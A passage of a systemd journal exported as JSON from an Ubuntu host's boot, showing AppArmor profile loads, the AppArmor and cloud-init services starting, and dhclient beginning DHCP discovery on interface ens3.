"\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781900000", "_AUDIT_ID" : "10", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/bin/lxc-start", "_PID" : "529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21a;b=e2b08827b5804427b422c10c84f1567e;m=74556b;t=5bd16dd37d4d2;x=de42aec6db752bfc", "__REALTIME_TIMESTAMP" : "1615280781907154", "__MONOTONIC_TIMESTAMP" : "7624043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7622430", "MESSAGE" : "audit: type=1400 audit(1615280781.900:10): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21b;b=e2b08827b5804427b422c10c84f1567e;m=758c7e;t=5bd16dd390be5;x=f4d167c850b5d58b", "__REALTIME_TIMESTAMP" : "1615280781986789", "__MONOTONIC_TIMESTAMP" : "7703678", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_AUDIT_ID" : "11", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/bin/man", "_PID" : "531" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21c;b=e2b08827b5804427b422c10c84f1567e;m=758ee1;t=5bd16dd390e49;x=e5b217df70efe210", "__REALTIME_TIMESTAMP" : "1615280781987401", "__MONOTONIC_TIMESTAMP" : "7704289", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_PID" : "531", "_AUDIT_ID" : "12", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_filter\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_filter" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21d;b=e2b08827b5804427b422c10c84f1567e;m=758f5a;t=5bd16dd390ec1;x=c0bbeffe5de99bf7", "__REALTIME_TIMESTAMP" : "1615280781987521", "__MONOTONIC_TIMESTAMP" : "7704410", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7703647", "MESSAGE" : "audit: type=1400 audit(1615280781.980:11): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21e;b=e2b08827b5804427b422c10c84f1567e;m=75915f;t=5bd16dd3910c6;x=28684cc8d8a1497c", "__REALTIME_TIMESTAMP" : "1615280781988038", "__MONOTONIC_TIMESTAMP" : "7704927", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_PID" : "531", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781984000", "_AUDIT_ID" : "13", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_groff\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_groff" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21f;b=e2b08827b5804427b422c10c84f1567e;m=78f2b1;t=5bd16dd3c7217;x=862c7cd4f0fc5f39", "__REALTIME_TIMESTAMP" : "1615280782209559", "__MONOTONIC_TIMESTAMP" : "7926449", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782204000", "_AUDIT_ID" : "14", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine", "_PID" : "533" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=220;b=e2b08827b5804427b422c10c84f1567e;m=78f44a;t=5bd16dd3c73b1;x=add7f7ace0088a9f", "__REALTIME_TIMESTAMP" : "1615280782209969", "__MONOTONIC_TIMESTAMP" : "7926858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782204000", "_PID" : "533", "_AUDIT_ID" : "15", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine//mount-namespace-capture-helper\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=221;b=e2b08827b5804427b422c10c84f1567e;m=78fe7c;t=5bd16dd3c7de3;x=d41d5ce55364f408", "__REALTIME_TIMESTAMP" : "1615280782212579", "__MONOTONIC_TIMESTAMP" : "7929468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=222;b=e2b08827b5804427b422c10c84f1567e;m=7aa48e;t=5bd16dd3e23f5;x=98aabf09c000db31", "__REALTIME_TIMESTAMP" : "1615280782320629", "__MONOTONIC_TIMESTAMP" : "8037518", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782316000", "_AUDIT_ID" : "16", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/sbin/tcpdump\" pid=537 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/sbin/tcpdump", "_PID" : "537" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=223;b=e2b08827b5804427b422c10c84f1567e;m=7aa887;t=5bd16dd3e27ee;x=2a93c48fc7221991", "__REALTIME_TIMESTAMP" : "1615280782321646", "__MONOTONIC_TIMESTAMP" : "8038535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : " ...done." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=224;b=e2b08827b5804427b422c10c84f1567e;m=7ab6b5;t=5bd16dd3e361d;x=1364507ad89130f1", "__REALTIME_TIMESTAMP" : "1615280782325277", "__MONOTONIC_TIMESTAMP" : "8042165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Started AppArmor initialization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782322885" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=225;b=e2b08827b5804427b422c10c84f1567e;m=7abd1b;t=5bd16dd3e3c82;x=2b59fb9d444212bb", "__REALTIME_TIMESTAMP" : "1615280782326914", "__MONOTONIC_TIMESTAMP" : "8043803", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Initial cloud-init job (pre-networking)...", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782326905" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=226;b=e2b08827b5804427b422c10c84f1567e;m=9dfc2c;t=5bd16dd617b93;x=b24e6efe5fdec21", "__REALTIME_TIMESTAMP" : "1615280784636819", "__MONOTONIC_TIMESTAMP" : "10353708", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "MESSAGE" : "Internet Systems Consortium DHCP Client 4.3.5", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784636742" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=227;b=e2b08827b5804427b422c10c84f1567e;m=9e04cd;t=5bd16dd618434;x=bc3c60b7fa04cd28", "__REALTIME_TIMESTAMP" : "1615280784639028", "__MONOTONIC_TIMESTAMP" : "10355917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Copyright 2004-2016 Internet Systems Consortium.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639018" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=228;b=e2b08827b5804427b422c10c84f1567e;m=9e05da;t=5bd16dd618541;x=b84a43eb2fa58f2e", "__REALTIME_TIMESTAMP" : "1615280784639297", "__MONOTONIC_TIMESTAMP" : "10356186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "All rights reserved.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639288" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=229;b=e2b08827b5804427b422c10c84f1567e;m=9e0677;t=5bd16dd6185de;x=d698504e74ccb48", "__REALTIME_TIMESTAMP" : "1615280784639454", "__MONOTONIC_TIMESTAMP" : "10356343", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "For info, please visit https://www.isc.org/software/dhcp/", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639446" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22a;b=e2b08827b5804427b422c10c84f1567e;m=9e0717;t=5bd16dd61867e;x=48ec75f5f0dd229d", "__REALTIME_TIMESTAMP" : "1615280784639614", "__MONOTONIC_TIMESTAMP" : "10356503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639606" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22b;b=e2b08827b5804427b422c10c84f1567e;m=9e1553;t=5bd16dd6194bb;x=bfb22e643e029b0f", "__REALTIME_TIMESTAMP" : "1615280784643259", "__MONOTONIC_TIMESTAMP" : "10360147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Listening on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643251" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22c;b=e2b08827b5804427b422c10c84f1567e;m=9e15bd;t=5bd16dd619525;x=92236d6c9cf78cdf", "__REALTIME_TIMESTAMP" : "1615280784643365", "__MONOTONIC_TIMESTAMP" : "10360253", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643360" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22d;b=e2b08827b5804427b422c10c84f1567e;m=9e1674;t=5bd16dd6195dc;x=b2891843f03c37b", "__REALTIME_TIMESTAMP" : "1615280784643548", "__MONOTONIC_TIMESTAMP" : "10360436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on Socket/fallback", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643541" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22e;b=e2b08827b5804427b422c10c84f1567e;m=9e1705;t=5bd16dd61966c;x=9f3edbe02215b3ff", "__REALTIME_TIMESTAMP" : "1615280784643692", "__MONOTONIC_TIMESTAMP" : "10360581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPDISCOVER on ens3 to 255.255.255.255 port 67 interval 3 (xid=0xf379735)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22f;b=e2b08827b5804427b422c10c84f1567e;m=9e1dfa;t=5bd16dd619d62;x=29ed3871bd0e37c0", "__REALTIME_TIMESTAMP" : "1615280784645474", "__MONOTONIC_TIMESTAMP" : "10362362", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf 